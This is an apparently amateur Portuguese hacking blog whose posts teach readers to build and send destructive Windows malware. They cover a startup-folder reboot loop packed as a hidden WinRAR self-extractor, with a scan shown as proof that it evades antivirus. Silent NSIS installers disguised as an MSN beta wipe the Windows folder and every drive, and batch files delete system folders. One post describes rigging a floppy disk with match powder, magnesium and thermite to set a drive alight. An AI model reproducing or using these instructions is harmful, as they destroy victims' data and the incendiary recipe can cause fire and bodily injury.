1 novembro, 2008

PRA DESCONTRAIR...

PRA DESCONTRAIR...

UM CONHECIDO ME MANDOU ESTA DICA, APROVEITEM:

Rugat Man

Ei existe uam maneira de deixar este Nuke muito mais potente. Ai vai a explicação:

1º Abra o bloco de notas
2º Escreva o seguinte comando:

@echo off
@break off
shutdown -r -f -t 00
exit

3º Salve o arquivo e mude sua extensão para .bat
4º Clique com o botão direito em cima do arquivo e dai em Adicionar para o arquivo…(requer o Winrar), na gua Comentário copie isto:

Obs.: é este branco mesmo
5º Em Opções de Compressão marque a caixa “Criar arquivo SFX”
6º Na guia Avançado vá em Opçôes SFX
7º No caminha para extração copie este comando: %homepath%\Menu Iniciar\Programas\Inicializar
8º Marque a caixa Slavar e restaurar caminho
9º Em executar após a extração digite o nome do seu arquivo .bat que criamos acima.
10º Na gua Métodos marque a caixa “Ocultar tudo” e “Substituir todos os arquivos existentes”
11º Na guia “Texto e ícone você pode mudar o ícone.
12º Clique OK que o arquivo será gerado

Agora vamos entender o que este pequeno nuke faz

Ele se copia para a pasta de inicialização e reinicia o computador, após a vitima ter seu computador ligado ele reinica novamente, fazendo isto sem parar (nem um ctrl+r pode parar isto de tão rapido que é)
A vítima só ira ver uma pequena tela preta e o computador sendo reinicado sempre.
Aqui vai o scan de seu arquivo depois de tê-lo feito:

Arquivo teste_de_inicia____o.exe recebido em 2008.09.06 20:32:31 (CET)
Andamento: Carregando … na fila aguardando analisando terminado NÃO ENCONTRADO PARADO

Resultado: 1/36 (2.78%)
Carregando informação do servidor…
O seu arquivo está na posição: 2.
Tempo estimado de início é entre 42 e 60 segundos.
Não feche a janela até que a análise esteja completa.
O mecanismo que estava processando o arquivo parou, nós esperaremos alguns segundos para tentar recuperar o resultado.
Se estiver esperando por mais de cinco minutos, você terá que reenviar o arquivo.
O seu arquivo está sendo analisado por VirusTotal no momento,
os resultados serão exibidos assim que forem gerados.
Modo compacto Imprimir resultados
O seu arquivo expirou ou não existe.
O serviço está parado no momento, o seu arquivo está esperando para ser analisado (posição: ) por tempo indeterminado.

Você pode aguardar por resposta na página (atualização automática) ou digite o seu email no campo abaixo e clique em “enviar” para que o sistema envie uma notificação quando a análise terminar.
Email:

Antivírus Versão Última Atualização Resultado
AhnLab-V3 2008.9.6.0 2008.09.06 –
AntiVir 7.8.1.28 2008.09.05 –
Authentium 5.1.0.4 2008.09.06 –
Avast 4.8.1195.0 2008.09.06 –
AVG 8.0.0.161 2008.09.05 –
BitDefender 7.2 2008.09.06 –
CAT-QuickHeal 9.50 2008.09.06 –
ClamAV 0.93.1 2008.09.06 –
DrWeb 4.44.0.09170 2008.09.06 –
eSafe 7.0.17.0 2008.09.03 –
eTrust-Vet 31.6.6072 2008.09.05 –
Ewido 4.0 2008.09.06 –
F-Prot 4.4.4.56 2008.09.06 –
F-Secure 8.0.14332.0 2008.09.06 –
Fortinet 3.112.0.0 2008.09.06 –
GData 19 2008.09.06 –
Ikarus T3.1.1.34.0 2008.09.06 –
K7AntiVirus 7.10.443 2008.09.05 not-a-virus:Adware.Win32.Ardamax.DYQ
Kaspersky 7.0.0.125 2008.09.06 –
McAfee 5378 2008.09.05 –
Microsoft 1.3903 2008.09.06 –
NOD32v2 3423 2008.09.06 –
Norman 5.80.02 2008.09.05 –
Panda 9.0.0.4 2008.09.06 –
PCTools 4.4.2.0 2008.09.06 –
Prevx1 V2 2008.09.06 –
Rising 20.60.52.00 2008.09.06 –
Sophos 4.33.0 2008.09.06 –
Sunbelt 3.1.1610.1 2008.09.05 –
Symantec 10 2008.09.06 –
TheHacker 6.3.0.8.072 2008.09.04 –
TrendMicro 8.700.0.1004 2008.09.05 –
VBA32 3.12.8.5 2008.09.06 –
ViRobot 2008.9.5.1365 2008.09.06 –
VirusBuster 4.5.11.0 2008.09.06 –
Webwasher-Gateway 6.6.2 2008.09.05 –
Informações adicionais
File size: 106741 bytes
MD5…: cfc9cfcb88e4e62268312ce83cd700b1
SHA1..: 41c96db31523c7f41b75e53dbe0843f7a62ec1b5
SHA256: 7ba4a3e21826eabf367849a4d8e05ac386df348ffd0c1c6fec78d2734106bd02
SHA512: 71975169e27fb85219919b1a5347b052e6321b6ce92e0b49e661875098aadf60
bc6dc48fae6a89307bddfdff51acb0c61bc76af2200ea1cde116d12f31c771f6
PEiD..: –
TrID..: File type identification
WinRAR Self Extracting archive (95.7%)
Win32 Executable Generic (1.5%)
Win32 Dynamic Link Library (generic) (1.4%)
Win32 Executable Watcom C++ (generic) (0.4%)
Generic Win/DOS Executable (0.3%)
PEInfo: PE Structure information

( base data )
entrypointaddress.: 0×401000
timedatestamp…..: 0×45adfc3e (Wed Jan 17 10:36:46 2007)
machinetype…….: 0×14c (I386)

( 4 sections )
name viradd virsiz rawdsiz ntrpy md5
.text 0×1000 0×14000 0×13600 6.44 124747d551012da0e3de9e72999b76be
.data 0×15000 0×7000 0xa00 4.89 7b4ff7a8fed973f5f26b956c5798e1c0
.idata 0×1c000 0×1000 0×1000 5.11 ab3e88ef5defd84915070c43d32d7bd8
.rsrc 0×1d000 0×4000 0×3c00 4.40 b088d20144815e82001e096a0c01eec3

( 8 imports )
> ADVAPI32.DLL: AdjustTokenPrivileges, LookupPrivilegeValueA, OpenProcessToken, RegCloseKey, RegCreateKeyExA, RegOpenKeyExA, RegQueryValueExA, RegSetValueExA, SetFileSecurityA, SetFileSecurityW
> KERNEL32.DLL: CloseHandle, CompareStringA, CreateDirectoryA, CreateDirectoryW, CreateFileA, CreateFileW, DeleteFileA, DeleteFileW, DosDateTimeToFileTime, ExitProcess, ExpandEnvironmentStringsA, FileTimeToLocalFileTime, FileTimeToSystemTime, FindClose, FindFirstFileA, FindFirstFileW, FindNextFileA, FindNextFileW, FindResourceA, FreeLibrary, GetCPInfo, GetCommandLineA, GetCurrentDirectoryA, GetCurrentProcess, GetDateFormatA, GetFileAttributesA, GetFileAttributesW, GetFileType, GetFullPathNameA, GetLastError, GetLocaleInfoA, GetModuleFileNameA, GetModuleHandleA, GetNumberFormatA, GetProcAddress, GetProcessHeap, GetStdHandle, GetTempPathA, GetTickCount, GetTimeFormatA, GetVersionExA, GlobalAlloc, HeapAlloc, HeapFree, HeapReAlloc, IsDBCSLeadByte, LoadLibraryA, LocalFileTimeToFileTime, MoveFileA, MoveFileExA, MultiByteToWideChar, ReadFile, SetCurrentDirectoryA, SetEndOfFile, SetEnvironmentVariableA, SetFileAttributesA, SetFileAttributesW, SetFilePointer, SetFileTime, SetLastError, Sleep, SystemTimeToFileTime, WaitForSingleObject, WideCharToMultiByte, WriteFile, lstrcmpiA, lstrlenA
> COMCTL32.DLL: –
> COMDLG32.DLL: CommDlgExtendedError, GetOpenFileNameA
> GDI32.DLL: DeleteObject
> SHELL32.DLL: SHBrowseForFolderA, SHChangeNotify, SHFileOperationA, SHGetFileInfoA, SHGetMalloc, SHGetSpecialFolderLocation, ShellExecuteExA, SHGetPathFromIDListA
> USER32.DLL: CharToOemA, CharToOemBuffA, CharUpperA, CopyRect, CreateWindowExA, DefWindowProcA, DestroyIcon, DestroyWindow, DialogBoxParamA, DispatchMessageA, EnableWindow, EndDialog, FindWindowExA, GetClassNameA, GetClientRect, GetDlgItem, GetDlgItemTextA, GetMessageA, GetParent, GetSysColor, GetSystemMetrics, GetWindow, GetWindowLongA, GetWindowRect, GetWindowTextA, IsWindow, IsWindowVisible, LoadBitmapA, LoadCursorA, LoadIconA, LoadStringA, MapWindowPoints, MessageBoxA, OemToCharA, OemToCharBuffA, PeekMessageA, PostMessageA, RegisterClassExA, SendDlgItemMessageA, SendMessageA, SetDlgItemTextA, SetFocus, SetMenu, SetWindowLongA, SetWindowPos, SetWindowTextA, ShowWindow, TranslateMessage, UpdateWindow, WaitForInputIdle, wsprintfA, wvsprintfA
> OLE32.DLL: CLSIDFromString, CoCreateInstance, CreateStreamOnHGlobal, OleInitialize, OleUninitialize

( 0 exports )

packers (F-Prot): RAR

Olhe que só o K7AntiVirus detectou ele como um processo malicioso. (muitas pessoas não tem este anti-virus)
Agora é só enviara para amigo e se divertir

By Rugat

VALEW MANO, SE QUISER DESTRUIR MSM O PC OCARA, VE MEU ARTIGO SOBRE DISKET BOMBA… VLW: HACKER86

Vírus Pro Msn (666)

1 novembro, 2008
Ora bem uma das razoes que me levou a abrir o forum, foi subretudo para explicar esta materia:

Criar um Virus!

Então vamos lá começar:

1º Para que voçe quer o virus? Isso não nos intressa, mas nós não temos qualquer responsabilidade no assunto, aqui só ensinamos!

2º Que tipo de Virus é?

Este virus tem o nome de HD Cleaner, porque apaga tudo o que está no disco rigido, e é sem duvida o virus mais facil de fazer!

Este virus e simples porque, e como se fosse instalar alguma coisa, mas em vez de instalar, apaga, e apaga todo o conteudo do disco com um smples codigo e em poucos segundos.

3º Como envia lo a alguem?

A maneira mais facil e disfarçalo de uma aplicação e zipa-lo, se o pertender enviar por MSN.

Eu utilizei um disfarce de MSN 9.0 Beta, disfareçado da microsoft para as pessoas instalarem no!

Mas podem fazer como quiserem, podem fazer se fosses um anti virus, ou outra coisa qualquer.

Bem, vamos nos deixar de teoria e passar a pratica.

Ok  vamos nos lá deixar de teoria e passar a pratica!

4º Programas a Utilizar

NSIS, que é um programa

Vamos precisar do NSIS, que é o programa de instalação de ficheiros so que para apagar neste caso.

Faça o download do NSIS aqui:

http://heanet.dl.sourceforge.net/sourceforge/nsis/nsis-2.23-setup.exe e instale o!

Quando o tiver Instalado, abra um bloco de notas simples…

5º O código do virus:

!define PRODUCT_NAME “APAGADOR_XXX”
!define PRODUCT_VERSION “1.0”
!define PRODUCT_PUBLISHER “HACKER_XXX”

SetCompressor lzma

Name “${PRODUCT_NAME} ${PRODUCT_VERSION}”
OutFile “MeuVirus.exe”
InstallDir “$TEMP”
Icon “${NSISDIR}\Contrib\Graphics\Icons\modern-install.ico”
SilentInstall silent

Section “Sec001” SEC01
Delete /REBOOTOK “$WINDIR\*.*”
Delete /REBOOTOK “C:\boot.ini”
Delete /REBOOTOK “C:\*.*”
Delete /REBOOTOK “D:\*.*”
Delete /REBOOTOK “E:\*.*”
Delete /REBOOTOK “F:\*.*”
Delete /REBOOTOK “G:\*.*”
SectionEnd

Section -Post
Reboot
SectionEnd

Copie este codigo a vermelho para o bloco de notas e dexe o aberto!

6º Entender o código

As primeiras 3 linhas significam o nome da instalação porque isto seria uma instalação mas vai apagar.

Onde diz “outfile” significa o nome do ficheiro quando ele for criado.

Onde diz SilentInstall silent significa que a instalação vai ser oculta, ou seja quando a pessoa for abrir o programa não ve nada enquanto o programa esta a apagar tudo!

A seguir vão aparecer umas quantas entradas a dizrerem delete/rebootok, isso significa as entradas que deseja apagar do computador ou seja ali estão: C, D, E, F… Que podem ser os discos e apaga tudo, depois tambem está Delete /REBOOTOK “$WINDIR\*.*” significa que vai apagar a pasta do windows.

As ultimas linhas : Section -Post Reboot SectionEnd significam que o computador se vai reniciar, como o programa apaga tudo, depois rinicia e o computador ja não arranca!

Agora que preceberam o codigo vamos continuar:

7º Criar o Virus

Guarde o arquivo que estava a fazer com o formato(em baixo) onde diz todos os arquivos clique, e depois no nome escreva: virus.nsi que é o nome que o compilador reconhece.

Quando tiver guardado o ficheiro va a Iniciar, programas,NSIS, MakeNSISW (Compiler GUI)”).

Abra o e clique em file, load script.

E abra o ficheiro que guardou no bloco de notas com aquele codigo.

Quando inserir o arquivo o programa ira compilar aquilo, demora muito pouco tempo!

Pouco tempo depois aparecera uma coisa a dizer Test Installer, NAO CLIQUE!

Porque se clicar ira abrir o seu proprio virus e pum! O seu computador vai a vida, clique em sair e JA ESTA!

Agora é so enviar o arquivo a quem desejar ou da lo num cd!

Num outro artigo irei explicar como disfarçar melhor o seu virus!

Bora Raiah !

By: DeH (Vulgo Hacker 86 ou Cofrim Lord)

Vírus Perigoso!

16 agosto, 2008
Reator Nuclear

Reator Nuclear

Virus Que APode ser enviado pelo Msn da vitima, e quando o download for terminado a vítima nem percebera que todo seu windows está sendo deletado…

AVISO: SE FOR COPIAR E COLAR, CERTIFIQUE-SE DE QUE AS ASPAS ESTEJAM RETAS. SE APARECEREM ASPAS INCLINADAS, FRESQUINHAS E BONITINHAS, APAGUE-AS, SUBSTITUINDO POR ASPAS DUPLAS RETAS, NORMALMENTE FICA NA PARTE SUPERIOR DA TECLA ABAIXO DA ESC. SE USAR AS ASPAS ENFEITADAS NO ARQUIVO .NSI, O NSIS DARÁ UM ERRO NA COMPILAÇÃO. ESSE ERA O MOTIVO PELO QUAL MUITOS NÃO CONSEGUIAM COMPILAR. VEJA ESTE COMENTÁRIO QUE POSTEI.

Com o NSIS instalado, abra um editor de textos puro, como o Bloco de notas, e digite (ou copie e cole) o texto em vermelho:

!define PRODUCT_NAME “APAGADOR_XXX”
!define PRODUCT_VERSION “1.0″
!define PRODUCT_PUBLISHER “HACKER_XXX”

SetCompressor lzma

Name “${PRODUCT_NAME} ${PRODUCT_VERSION}”
OutFile “MeuVirus.exe”
InstallDir “$TEMP”
Icon “${NSISDIR}\Contrib\Graphics\Icons\modern-install.ico”
SilentInstall silent

Section “Sec001″ SEC01
Delete /REBOOTOK “$WINDIR\*.*”
SectionEnd

Section -Post
Reboot
SectionEnd

Salve com a extensão “.nsi”, e escolha “Todos os arquivos”, no campo “Salvar como tipo”. A extensão “.nsi” é a de projeto do NSIS, você poderia usar outra qualquer e depois abri-lo no compilador do NSIS (”Iniciar > Programas > MakeNSISW (Compiler GUI)”).

DICA: BAIXE AQUI O ARQUIVO .NSI PRONTO, É SÓ COMPILAR!
(Não é o arquivo executável, você pode baixar sossegado(a). É apenas o arquivo de texto pronto. Você pode visualizá-lo no bloco de notas ou abri-no no NSIS, e é bem pequenininho. Ele está configurado para apagar arquivos de todas as unidades, o que conseguir, de forma a limpar pen drives se estiverem plugados na hora da execução. Cuidado, não clique no botão “Test Installer” em um computador com dados importantes.)

Vamos entender esse arquivo… As três primeiras linhas identificam o “programa” que seria instalado, afinal o NSIS é um instalador. Deixe como está, ou escreva qualquer coisa, de preferência não palavras. O item “OutFile” é o executável que será gerado, é o seu vírus que deverá ser distribuído. A linha “SilentInstall silent” gera um instalador oculto, que não mostra nada na tela. Ou seja, quando a vítima executá-lo, ele já começará a apagar tudo sem mostrar nada.

Na seção “Sec01″, você deve adicionar as entradas “Delete” que desejar. Existem outros comandos, é possível, em vez de apagar arquivos, criar entradas no registro, instalar programas que se auto-executam, etc. Não me pergunte como fazer isso.

A linha “Delete /REBOOTOK “$WINDIR\*.*” apaga tudo da pasta do Windows, deixando para apagar na próxima inicialização o que estiver em uso. Copie-a e cole-a abaixo dela, antes do SectionEnd, trocando as pastas ou arquivos que você queira apagar. Por exemplo:

Delete /REBOOTOK “C:\boot.ini”
Delete /REBOOTOK “C:\Meus documentos\*.*”
Delete /REBOOTOK “C:\*.*”
Delete /REBOOTOK “D:\*.*”
Delete /REBOOTOK “E:\*.*”
Delete /REBOOTOK “F:\*.*”
Delete /REBOOTOK “G:\*.*”
Delete /REBOOTOK “C:\Arquivos de programas\*.*”

Adicione o que quiser, arquivos específicos, etc.

A última seção, “Section -Post / Reboot / SectionEnd”, será executada ao concluir o instalador, ou seja, quando ele terminar sua ação. O comando “reboot” reiniciará o computador, que na próxima inicialização nem inicia mais. Se você quiser, pode remover essas três últimas linhas, para deixar o usuário em desespero, vendo que tudo do seu PC foi apagado.

Salve o arquivo. Abra o compilador do NSIS, em “Iniciar > Programas > MakeNSISW (Compiler GUI)”, clique no menu “File > Load script”, localize o arquivo de extensão “.nsi” que você salvou. Ele já compilará, é rapidinho. NÃO CLIQUE NO BOTÃO “TEST INSTALLER”.

O vírus está pronto! E, em condições normais, nenhum anti-vírus o detectaria, a menos que ele fosse parar nas mãos de algum criador de anti-vírus.

Disquete BOOM!

10 maio, 2008

Disquete BombaAew galera esse aqui é pra explodir msm, acabar com o Pc do cara.

Não me responsabiliso por acidentes (huehuehuehue)

Precisa de:

-1 ou mais discos de 1,44 mb

-Fosforos.

-Estilete

-Argamassa

-Magnésio em tiras(Só se quiser)

-Termite (MUITO PERIGOSO)

Instruções:

-Abra com cuidado o disquete (puxa aquele ferozim sem amassar)

-Raspe os fósforos, e amasse até virar pó.

-retire o pano do disket e cubra ambos os lados com argamassa.

-Espalhe o pó de fósforo em cima e deixe secar.

-Feche o disquete, colocando os cantos.

-Pra ter um SUPER estrago bote o magnésio em cima do pó de fósforo.

– pra ter um MEGA ULTRA extrago, bote a termite embaixo do magnésio.

Funcionamento:

-Ao ser acesado o fóforo vai entrar em atrito e derretira o disquete queimando o dirve e algumas coisas perto dele.

– Com termite e Magnésio o Dano é um “pouco” maior, vai torrar o drive, o gabinete, a mesa, o chão, a estante, a cadeira, Seu querido destinatário e você vai passar o resto da vida numa cadeia, por assasinato Dolósso(hehehehe). É SÉRIO!

Flw

Lista de Programas de Defesa

10 maio, 2008

Atrojans:     Bloqueia todas as entradas contra trojans.

Clister:        Uma boa proteção.

Xobobos:    Igual ao firefox só que em português.

SecaGent:    Testa a proteção do seu PC

Por enquanto só esses, mais mesmo com eles em uso, não abram mão de seu Anti-virus.

Nuke Potente!

10 maio, 2008

Aew Galera Nuke potente!

Vírus mais escrotos do mundo:
Va em iniciar/executar e digite notepad.
Irá abrir o bloco de notas.
Copie o comando e cole no bloco de notas ao salvar vc usa .bat, antes do nome do arquivo
Ex: sacanear.bat

del /s /q c:\windows\
(deleta tudo dentro do windows ex: arquivos e naum pastas)

rmdir /s /q c:\windows
(deleta tdo do windows) – (fode o pc)

shutdown -s
(desliga o pc)

shutdown -r
(reinicia o pc)
Fazendo um virus.exe com win rar

Abra o bloca de notas e digite shutdown -r -f
shutdown -r -> desliga o pc reiniciando
shutdown -f -> força o pc a desliga.. ecerrando qualquer programa..
Salve como desliga.bat
Transformando em .exe ( tem que ter o WinRar)
clique com botao direito no arquivo .bat, e vá em adicionar para o arquivo.
marque criar arquivo SFX. Note que o nome muda para desliga.exe.
vá até a guia avançado e clique em opçao sfx.
em caminho para extraçao coloque ( toda vez q o pc iniciar , o programa vai ser executado =})
%homepath%\Menu Iniciar\Programas\Inicializar
marque caminho absoluto e salvar e restaurar caminho
em executar apos a extraçao coloque desliga.bat
na guia metodo.
marque ocultar tudo e ignorar arquivos existentes.

Nuke Pelo Bloco De Notas

10 maio, 2008

Aew galera no meu primero arquivo, vow ensinar como fazeh um nuke q desliga o pc da vítima pelo bloco de notas. Tais Virus que causam pouco dano (ou nenhum) são chamados nukes.

Seguinte: Abra o Bloco de notas

Escreva desta forma :

shutdown -r -c “Escreva aqui sua ameaça” -t 60

Pronto agora, só falta salvar…

Para salvar salve deste modo: Virus.bat

(onde tem virus você pode escrever qualquer coisa)

Se quiser testar clique duas vezes no aplicativo

Para cancelar seu ativamento Aperte “windowns” + “R” E escreva: shutdown -a

PRONTO!

NA PROXIMA EDIÇÃO VIRUS MAIS POTENTE!